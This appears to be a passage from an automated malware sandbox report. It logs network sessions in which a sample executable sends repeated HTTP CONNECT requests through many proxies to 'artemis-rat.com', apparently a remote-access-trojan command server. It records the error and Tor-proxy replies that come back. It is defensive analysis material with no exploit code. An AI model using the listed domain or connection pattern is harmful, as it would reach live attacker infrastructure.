                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            393192.168.2.551061184.178.172.28152943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.142143965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            394192.168.2.551186104.21.102.95803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.145020008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.305057049 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            395192.168.2.551159159.65.77.16885853876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.150468111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.326426029 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            396192.168.2.551216104.23.100.73803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.183171988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.337867975 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            397192.168.2.55107672.210.252.134461643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.183262110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            398192.168.2.55100851.75.125.208481143876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.183495998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            399192.168.2.551019212.118.43.143803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.183631897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.890126944 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            400192.168.2.55097543.255.113.23280843876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.183784008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.538110971 CET208INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Server: HCS
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 05:18:02 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                                            HCS-Error: ERR_FTP_NOT_FOUND 0
                                                                                                                                                                                                                                                            X-NGAA: MISS from CH-XW-NO1-315.4
                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            401192.168.2.551049217.112.80.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184104919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.373616934 CET857INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
                                                                                                                                                                                                                                                            Content-Length: 640
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6d 20 50 48 50 2f 37 2e 34 2e 32 37 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            402192.168.2.550126154.118.228.212803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184107065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            403192.168.2.55103851.15.210.79163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184166908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.811101913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.686093092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.990741968 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            404192.168.2.55122785.31.234.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184176922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.639225960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.154845953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.170545101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.217936993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.358632088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.424065113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.599617958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.811464071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            405192.168.2.551036163.172.147.9163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184257984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.139297962 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
